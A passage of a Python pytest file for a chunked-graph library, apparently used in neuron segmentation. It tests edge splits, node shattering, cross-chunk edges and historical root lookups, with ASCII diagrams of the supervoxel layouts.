assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp) == \
cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0), time_stamp=fake_timestamp)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 1, 0, 0, 0)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
assert len(cgraph.get_latest_roots()) == 2
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_verify_cross_chunk_edges(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (same chunk) and verify the cross-chunk edges
┌─────┬─────┬─────┐ ┌─────┬─────┬─────┐
| │ A¹ │ B¹ │ | │ A¹ │ B¹ │
| │ 1━━┿━━3 │ => | │ 1━━┿━━3 │
| │ | │ │ | │ │ │
| │ 2 │ │ | │ 2 │ │
└─────┴─────┴─────┘ └─────┴─────┴─────┘
"""
cgraph = gen_graph(n_layers=4)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 2, 0, 0, 0), inf),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 2, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 2, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[2, 0, 0], [3, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0))
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1), mincut=False)
svs2 = cgraph.get_subgraph_nodes(new_root_ids[0])
svs1 = cgraph.get_subgraph_nodes(new_root_ids[1])
len_set = {1, 2}
assert len(svs1) in len_set
len_set.remove(len(svs1))
assert len(svs2) in len_set
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0))
cc_dict = cgraph.get_atomic_cross_edge_dict(cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0)))
assert len(cc_dict[3]) == 1
assert cc_dict[3][0][0] == to_label(cgraph, 1, 1, 0, 0, 0)
assert cc_dict[3][0][1] == to_label(cgraph, 1, 2, 0, 0, 0)
assert len(cgraph.get_latest_roots()) == 2
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_verify_loop(self, gen_graph):
"""
Remove both edges between RG supervoxel 1 and supervoxels 3 and 4 (same chunk)
┌─────┬────────┬─────┐ ┌─────┬────────┬─────┐
| │ A¹ │ B¹ │ | │ A¹ │ B¹ │
| │ 4━━1━━┿━━5 │ => | │ 4 1━━┿━━5 │
| │ / │ | │ | │ │ | │
| │ 3 2━━┿━━6 │ | │ 3 2━━┿━━6 │
└─────┴────────┴─────┘ └─────┴────────┴─────┘
"""
cgraph = gen_graph(n_layers=4)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 2), to_label(cgraph, 1, 1, 0, 0, 3)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 2, 0, 0, 0), inf),
(to_label(cgraph, 1, 1, 0, 0, 1), to_label(cgraph, 1, 2, 0, 0, 1), inf),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 2), .5),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 3), .5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 2, 0, 0, 0), to_label(cgraph, 1, 2, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 2, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 2, 0, 0, 1), to_label(cgraph, 1, 1, 0, 0, 1), inf),
(to_label(cgraph, 1, 2, 0, 0, 1), to_label(cgraph, 1, 2, 0, 0, 0), .5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[2, 0, 0], [3, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1))
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0))
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 2), mincut=False)
assert len(new_root_ids) == 2
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 3), mincut=False)
assert len(new_root_ids) == 2
cc_dict = cgraph.get_atomic_cross_edge_dict(cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0)))
assert len(cc_dict[3]) == 1
assert len(cgraph.get_latest_roots()) == 3
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_pair_disconnected_chunks(self, gen_graph):
"""
Remove edge between existing RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1━━┿━━━━━┿━━2 │ => │ 1 │ │ 2 │
│ │ │ │ │ │ │ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 127, 127, 127, 0), 1.0)],
timestamp=fake_timestamp)
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[(to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0), 1.0)],
timestamp=fake_timestamp)
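# Same octree ladder as in the merge tests: the pair coordinates halve per
# level until layer 9 joins the two corner chunks.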
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Split
new_roots = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_roots) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 127, 127, 127, 0) in leaves
# Check Old State still accessible
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp) == \
cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0), time_stamp=fake_timestamp)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 127, 127, 127, 0)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0), time_stamp=fake_timestamp)
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 127, 127, 127, 0) in leaves
@pytest.mark.timeout(30)
def test_split_pair_already_disconnected(self, gen_graph):
"""
Try to remove edge between already disconnected RG supervoxels 1 and 2 (same chunk).
Expected: No change to the rows; remove_edges raises a PreconditionError
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1 2 │ => │ 1 2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Split
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
res_new = cgraph.table.read_rows()
res_new.consume_all()
# Check
if res_old.rows != res_new.rows:
warn("Rows were modified when splitting a pair of already disconnected supervoxels. "
"While probably not an error, it is an unnecessary operation.")
@pytest.mark.timeout(30)
def test_split_full_circle_to_triple_chain_same_chunk(self, gen_graph):
"""
Remove direct edge between RG supervoxels 1 and 2, but leave indirect connection (same chunk)
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1━2 │ => │ 1 2 │
│ ┗3┛ │ │ ┗3┛ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 2), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 2), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.3)],
timestamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 1
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 2)) == new_root_ids[0]
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 2)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 2)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 2))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 0, 0, 0, 1) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_ids[0]))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 2) in leaves
# Check Old State still accessible
old_root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert new_root_ids[0] != old_root_id
# assert len(cgraph.get_latest_roots()) == 1
# assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_full_circle_to_triple_chain_neighboring_chunks(self, gen_graph):
"""
Remove direct edge between RG supervoxels 1 and 2, but leave indirect connection (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1━━┿━━2 │ => │ 1 │ 2 │
│ ┗3━┿━━┛ │ │ ┗3━┿━━┛ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 1, 0, 0, 0), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 0.3)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.3)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 1
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_ids[0]
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 1, 0, 0, 0) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_ids[0]))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
# Check Old State still accessible
old_root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert new_root_ids[0] != old_root_id
assert len(cgraph.get_latest_roots()) == 1
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_full_circle_to_triple_chain_disconnected_chunks(self, gen_graph):
"""
Remove direct edge between RG supervoxels 1 and 2, but leave indirect connection (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1━━┿━━━━━┿━━2 │ => │ 1 │ │ 2 │
│ ┗3━┿━━━━━┿━━┛ │ │ ┗3━┿━━━━━┿━━┛ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
loc = 2
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, loc, loc, loc, 0), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, loc, loc, loc, 0), 0.3)],
timestamp=fake_timestamp)
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, loc, loc, loc, 0)],
edges=[(to_label(cgraph, 1, loc, loc, loc, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, loc, loc, loc, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.3)],
timestamp=fake_timestamp)
for i_layer in range(3, 10):
if loc // 2**(i_layer - 3) == 1:
cgraph.add_layer(i_layer, np.array([[0, 0, 0], [1, 1, 1]]), time_stamp=fake_timestamp)
elif loc // 2**(i_layer - 3) == 0:
cgraph.add_layer(i_layer, np.array([[0, 0, 0]]), time_stamp=fake_timestamp)
else:
cgraph.add_layer(i_layer, np.array([[0, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(i_layer, np.array([[loc // 2**(i_layer - 3), loc // 2**(i_layer - 3), loc // 2**(i_layer - 3)]]), time_stamp=fake_timestamp)
assert cgraph.get_root(to_label(cgraph, 1, loc, loc, loc, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, loc, loc, loc, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 1
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, loc, loc, loc, 0)) == new_root_ids[0]
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, loc, loc, loc, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, loc, loc, loc, 0) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_ids[0]))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, loc, loc, loc, 0) in leaves
# Check Old State still accessible
old_root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert new_root_ids[0] != old_root_id
assert len(cgraph.get_latest_roots()) == 1
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_same_node(self, gen_graph):
"""
Try to remove (non-existing) edge between RG supervoxel 1 and itself
┌─────┐
│ A¹ │
│ 1 │ => Reject
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Split
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_split_pair_abstract_nodes(self, gen_graph):
"""
Try to remove (non-existing) edge between RG supervoxel 1 and abstract node "2"
┌─────┐
│ B² │
│ "2" │
│ │
└─────┘
┌─────┐ => Reject
│ A¹ │
│ 1 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Split
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 2, 1, 0, 0, 1), mincut=False)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_diagonal_connections(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
and edge between RG supervoxels 1 and 3 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2━1━┿━━3 │
│ / │ │
┌─────┬─────┐
│ | │ │
│ 4━━┿━━5 │
│ C¹ │ D¹ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 1, 1, 0, 0), inf),
(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 1, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), inf)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0]]))
rr = cgraph.range_read_chunk(chunk_id=cgraph.get_chunk_id(layer=3, x=0, y=0, z=0))
root_ids_t0 = list(rr.keys())
assert len(root_ids_t0) == 1
child_ids = []
for root_id in root_ids_t0:
cgraph.logger.debug(("root_id", root_id))
child_ids.extend(cgraph.get_subgraph_nodes(root_id))
new_roots = cgraph.remove_edges("Jane Doe",
to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 1),
mincut=False)
assert len(new_roots) == 2
assert cgraph.get_root(to_label(cgraph, 1, 1, 1, 0, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 0, 1, 0, 0))
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
@pytest.mark.timeout(30)
def test_shatter(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
and edge between RG supervoxels 1 and 3 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2━1━┿━━3 │
│ / │ │
┌─────┬─────┐
│ | │ │
│ 4━━┿━━5 │
│ C¹ │ D¹ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 1, 1, 0, 0), .1),
(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 1, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), .1)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0]]))
new_root_ids = cgraph.shatter_nodes("Jane Doe", atomic_node_ids=[to_label(cgraph, 1, 0, 0, 0, 0)])
cgraph.logger.debug(new_root_ids)
assert len(new_root_ids) == 3
class TestGraphMergeSplit:
@pytest.mark.timeout(30)
def test_multiple_cuts_and_splits(self, gen_graph_simplequerytest):
"""
┌─────┬─────┬─────┐ L X Y Z S L X Y Z S L X Y Z S L X Y Z S
│ A¹ │ B¹ │ C¹ │ 1: 1 0 0 0 0 ─── 2 0 0 0 1 ─── 3 0 0 0 1 ─── 4 0 0 0 1
│ 1 │ 3━2━┿━━4 │ 2: 1 1 0 0 0 ─┬─ 2 1 0 0 1 ─── 3 0 0 0 2 ─┬─ 4 0 0 0 2
│ │ │ │ 3: 1 1 0 0 1 ─┘ │
└─────┴─────┴─────┘ 4: 1 2 0 0 0 ─── 2 2 0 0 1 ─── 3 1 0 0 1 ─┘
"""
cgraph = gen_graph_simplequerytest
rr = cgraph.range_read_chunk(chunk_id=cgraph.get_chunk_id(layer=4, x=0, y=0, z=0))
root_ids_t0 = list(rr.keys())
child_ids = []
for root_id in root_ids_t0:
cgraph.logger.debug(f"root_id {root_id}")
child_ids.extend(cgraph.get_subgraph_nodes(root_id))
